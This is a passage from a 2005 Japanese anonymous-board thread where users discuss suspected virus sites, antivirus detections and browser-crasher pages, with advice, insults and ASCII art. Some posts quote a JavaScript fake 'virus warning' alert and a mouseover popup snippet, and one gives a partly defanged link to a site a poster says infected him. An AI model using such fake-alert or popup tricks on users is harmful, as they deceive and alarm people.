Subject: Re: ウィルス検体
キングソフトサポートセンターです。
ご報告ありがとうございます。
いただいたデータもしくはURLを検証いたしております。
対応でき次第、アップデートにて対応する予定です。
ただし、新種と診断された場合は、再度ご連絡を差し上げます。
よろしくお願いします。
885 :
884 :2005/10/12(水) 11:06:26
すみません・・・・・
886 :
名無しさん@お腹いっぱい。 :2005/10/13(木) 21:13:42
>>886 ノートンにしか反応しないんだから、きっと精神的ブラクラの類。
<SCRIPT LANGUAGE="JavaScript"> <!-- function Pagein(){ alert("ウィルス警告\n\nExplorerAntiVirusがコンピュータ上でウィルスを検出しました。\nオブジェクト名:\\Temporary Internet Files\\Content.IE5\\...\nウィルス名:VBS.Network.E\n適用した処理:ファイルを修復出来ません。"); } //--> </SCRIPT> …騙しっぽい。
∧_∧ ( ´∀`) / ̄ ̄ ̄ ̄ ̄ ( ) < 反日ソフトだよ。怖いよ。 | | | \_____ (__)___)
>>876 未対応の新種ウィルスをネットで送るのか
馬鹿ですか
895 :
名無しさん@お腹いっぱい。 :2005/10/18(火) 21:46:05
開いたけど感染しない。
>>871 JS/Offiz.A トロイだそうです。
897 :
名無しさん@お腹いっぱい。 :2005/10/18(火) 22:28:45
今の所セキュリティパッチを全部適用してある場合には、 開いただけで感染するページは発見されていないから 残念!
あぼーん
900 :
名無しさん@お腹いっぱい。 :2005/10/19(水) 20:31:37
___
/ \
/ ⌒ ⌒ \
| ・ ・ | / ̄ ̄ ̄ ̄ ̄ ̄ ̄
| │ <
>>889 臭せぇんだよ。
\ ∪ ノ \_______
\____/
/ TIN \
901 :
名無しさん@お腹いっぱい。 :2005/10/19(水) 20:34:06
って
>>889 に言おうとしたけど
番号間違えたOTL
903 :
名無しさん@お腹いっぱい。 :2005/10/20(木) 00:00:03
googleで「引き続き任務を」って検索すると マカフィーがトロイの木馬を発見しました っていうんですけど…
904 :
名無しさん@お腹いっぱい。 :2005/10/20(木) 11:55:31
906 :
名無しさん@お腹いっぱい。 :2005/10/20(木) 12:32:26
本当に感染したのならログ張り付けれ
相手すんな
相手して下さいよ
>>905 大体読みました
誤反応なんですね ありがとうございました
909 :
名無しさん@お腹いっぱい。 :2005/10/20(木) 16:36:02
アンカー開いただけでページに飛ぶようにしたいんですけど、 具体的にどうすればいいでしょうか 飛べる様にしてるレスがあったんですが旨くいかなくて。
>>909 何だ? 携帯用の糞面白くもねぇーサイトじゃねぇか.....
912 :
名無しさん@お腹いっぱい。 :2005/10/22(土) 21:05:19
ウイルスってどうやって作るの?
914 :
名無しさん@お腹いっぱい。 :2005/10/23(日) 22:57:49
このレス呼んでたらavastが反応した
915 :
名無しさん@お腹いっぱい。 :2005/10/25(火) 13:11:26
>>871 VBS:Malware[Gen]
だってよ。
916 :
名無しさん@お腹いっぱい。 :2005/10/26(水) 16:04:03
VBS:Malware[Gen
↓危険です。以前、どっかのスレに貼られてた tp://www.xybererotica.com/ を間違えて踏んでしまい(Janeで閲覧中)、何かに感染しますた・・普段は タブブラウザ使用でActive X、Java、JavaScriptなど全部切っているのですが、 標準のブラウザに設定していなかった為、踏んだらIEが起動して・・。 その時インターネットオプションの設定はJava、JavaScriptがオンになっていたので 感染しました・・orz 確か開いた時にSun Javaが勝手に起動したような気がします。 AVGでスキャンして2、3個引っかかったので名前もろくに見ないで削除して しまって現在に至るのですが、どういうウィルスに感染したのでしょうか・・ AVGで削除したので大丈夫なんでしょうか?心配です・・長文すみません。
918 :
917 :2005/10/28(金) 09:57:21
げっ・・wwwから書けばよかった・・すみません。2chブラウザだと リンクになっちゃってますね(;´д`)
>>917 そこまで防御していながらWindowsUpdateをしていない馬鹿さ加減が笑えません。震度家
あぼーん
あぼーん
922 :
名無しさん@お腹いっぱい。 :2005/10/28(金) 12:42:15
923 :
名無しさん@お腹いっぱい。 :2005/10/28(金) 23:47:20
yaromat.com サイト入って、一番上の項目選んだら変な文字が出て来たんですけどウイルスですか?
924 :
917 :2005/10/28(金) 23:53:35
>>919 レスありがとうございます。確かその時もWindowsUpdateで最新の状態に
していたはずなんですが・・AVGで駆除できる種類のものですか?お願い
です・・教えていただけないでしょうか(´Д`;)
レスチェックできなかったので、
>>920-921 は何だったんでしょうか?気になる。
925 :
名無しさん@お腹いっぱい。 :2005/10/29(土) 00:05:17
927 :
名無しさん@お腹いっぱい。 :2005/10/29(土) 01:38:48
あぼーん
929 :
924 :2005/10/30(日) 01:31:33
>>917 です。どなたか、教えていただけないでしょうか・・。
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) <
>>930 つまんねー。
| | | \_____
(__)___)
__,. -─-- 、_ , - ' _,´ --──‐- ) ,イ´__-___,. -‐ '__,. - '´ `ー----, - ' ´ ̄ `` 、__ __,ィ ヽ. `ヽ. , '⌒Y / 、ヽ ヽ ヽ. / / i /l/|_ハ li l i li ハ . // 〃 /l i|j_,.//‐'/ lTト l、l j N i | {イ l / l li //___ リ_lノ lル' lハ. ソ ___◎_r‐ロユ i| /レ/l l l v'´ ̄ , ´ ̄`イ !| ll,ハ └─‐┐ナ┐┌┘ _ ヘ____ ハ| ll∧ハヽ ト、 '''' r==┐ '''' /l jハ| ll ll /./┌┘└┬┘└┼────┘ロコ┌i 〃 ‖ レ'¨´ヽiへ. _ 、__,ノ ,.イ/|/ ノ ll l| </  ̄L.l ̄ ̄L.lL.! ┌┘| ll ll { ⌒ヽ_/ } ー‐<.__ ′ l| ‖ ‖ ‖ ヽ, /、 〈 |:::::::| `ヽ ‖ ‖ {. ハ ヽ Y`‐┴、::::v l ‖ ‖ |iヽ{ ヽ_ゾノ‐一’::::ヽ. | ‖ ‖ |i:::::`¨´-- :::......:...:.:.::.}| ‖ ‖ |i::::::ヽ._:::_:::::::::::::::::::_ノ | ‖ ‖ |i::::::::::::i___:::::::::::/ | jj::::::::r┴-- `ー‐ '⌒ | 〃:::::::マ二 _,ノ //::::::::::::i ー 一 '´ ̄::. ,','::::::::::::::i::::::::::::::::::::::i::::::ヽ
934 :
929 :2005/10/31(月) 04:06:55
>>930 ・・・・・。
というか、このスレ読んでjpgでも油断できない事を知りますた。
>>917 のウィルス or スパイウェアについて教えてくださる親切な方はおられない
のでせうか?
937 :
929 :2005/11/01(火) 01:16:15
938 :
名無しさん@お腹いっぱい。 :2005/11/01(火) 05:30:33
あぼーん
>>917 Sun Javaも最新にしとけや ドアホ
>>941 無問題
ソース見れば分かるかと
JavaScriptでメッセージボックス出してるだけ
…なんか多いな、こういうの
944 :
名無しさん@お腹いっぱい。 :2005/11/09(水) 18:46:03
945 :
名無しさん@お腹いっぱい。 :2005/11/10(木) 14:47:41
>>945 Trojan.Noclose チェイサーで治療を選択したけど
HyperTerminalが数枚立ち上がって、でもTAPI?エラーで接続は
しなくて、Meなので最終的には電源切るしかなかったよ。
>>945 Telnetクライアントが勝手に起動して接続しようとするだけ
実際にはそれらのTelnetサーバーは応答も何もしない
バカにされているだけ 無視で結構
949 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 16:12:56
>>949 コマンド プロンプト
3枚ぐらい開いて、warez.comへ接続。
軽いウイルスに感染する。
953 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 21:02:37
>>953 その追跡者開発コード(Bloodhound.Exploit)という意味は何なんだろうかね?
955 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 21:10:14
>>955 You have version 8,0,22,0 installed
今はどこでもインストールされるのはこっちにしちゃってるだろ
958 :
名無しさん@お腹いっぱい。 :2005/11/26(土) 10:10:20
スパイウェアMediaMax が入ったCDのタイトル名は公表されているの?
959 :
952 :2005/11/28(月) 04:56:54
>>922 俺も踏んだ
スクリプトもActiveXもJAVAもOFFにしてたから大丈夫かな
詳しい人助けて、、、
>>960 windows フォルダに<ランダムな数字>.EXEみたいな実行ファイルは無い?
962 :
960 :2005/11/29(火) 09:32:23
>>961 ありがとう
返事遅れて申し訳ないス。
一様、system、system32フォルダも調べましたが
それらしきものは見当たりませんでした。
あのサイトの悪さの仕組みや、それによって起こる害はどんなものなのかを
教えていただければ有難いス。
>>962 >それによって起こる害はどんなものなのかを
>教えていただければ有難いス。
ざけんじゃねえ てめえで感染して調べやがれ
964 :
960 :2005/11/29(火) 10:26:14
感染してみなければ分からないものだとしたら
大変失礼しました。
>>961 さんがソースを見て感染の過程と結果を
読んだうえでレスしてくださっているものだと考えたのです。
すいません。
965 :
961 :2005/11/29(火) 19:39:08
963 は私じゃありません。 で、ソースを見たわけではなく私自身が感染した結果、<ランダムな数字>.EXE が 生成されていたのでした。 テヘ
966 :
961 :2005/11/29(火) 21:24:19
いま、ソースを見てみたんですがbody onload を使ったトラップのようですね。 activeX, java がoff なら大丈夫っぽいっすよ。 ・・・じゃあ、私はドコで感染したんだろう(汗
968 :
名無しさん@お腹いっぱい。 :2005/12/12(月) 12:25:21
原因はこれだろ img src="file:///H|/image/spacer.gif" alt="" width="1" height="3"
>>973 見た目だけのこけおどしサイト
全部スクリプトとフラッシュで表示している
>>973 ついでに付け加えるとあとは、.gif画像な。
>>973 function confirmPopup() 内、
「18歳以上ですか?」で「18歳以下のお客様のご利用は出来ません〜」。
どっちですか。多分「18歳未満の〜」の間違いだろうけど。
下の方はちゃんと「18歳未満〜」だなw
977 :
973 :2005/12/15(木) 21:51:58
みなさんありがとうございます。 ただ、PCの方は完全にぶっ壊れてしまいました。立ち上がらなくなりました。 サイト内の左にある炉利のところ踏んじゃったんですがorz、そこに何か あったんですかね?ちなみん、オンラインウィルススキャンしてもウィルスは 見つかりませんでした。
978 :
名無しさん@お腹いっぱい。 :2005/12/15(木) 21:54:10
危険!HTML.Redlof.Aを発見! (1) 危険!JS_PSYME.Vを発見! (1) ブラクラチェックが終了しました。
>>977 ウィルスも何もありません 完全無害 関係ない
とっくに何かに感染でもしていたんだろうよ
980 :
978 :2005/12/15(木) 21:54:44
どうなりますか?
>>980 セキュリティホールを開けたままにしていなければ関係ありません
982 :
978 :2005/12/15(木) 22:02:58
983 :
978 :2005/12/15(木) 22:06:00
>>981 ノートン先生が修復できません と言っていたのですが大丈夫ですか?
>>982 VBS/Redlofになど感染するやつなど今はいません
Microsoft VMのいつのセキュリティホールだと思ってるんだよ
>>983 WindowsUpdateして最新にしているのなら感染活動出来ません
ノートンなんか無視して結構
986 :
978 :2005/12/15(木) 22:10:58
>>973 こりゃすごいな。
昔見たやつは登録番号とIPアドレスだけの表示だったが、
FlashやGIFアニメで何か仕込んだように見せかけ、Whoisの情報まで
表示するとはな。
一応、進化しているんだなw
988 :
973 :2005/12/16(金) 00:45:26
>>979 ありがとうございます。
どうやらPCを酷使し過ぎたのが原因かな?
>>987 ええ、そりゃあもう焦りましたよ。
右手に握っているものの処理だけ済ませてから、大慌てですよ。
989 :
987 :2005/12/16(金) 00:49:32
>>988 一応、俺の愛機はウイルス対策ソフト(大手御三家の製品)を有効にしてあるが、
何も検出しなかったぞ。
789おp@「
993 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 17:50:50
upupupuupupupuuupupupupuuupuupuppupupup
<a onmouseover=window.open("");>ewrtyui</a>
>>995 ウイルスバスターでは検出できないねぇ。
何だろうねぇ。
メモ帳のアイコンだねぇ。
実に怪しいねぇ。
そもそも見て危ないってわからないかなぁ。
拡張子がexeだもんねぇ。
こんなのは基本中の基本だねぇ。
>>995 Win32/PSW.Lineage.DN トロイ の亜種
by NOD32
ume
初の1000ゲット!
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。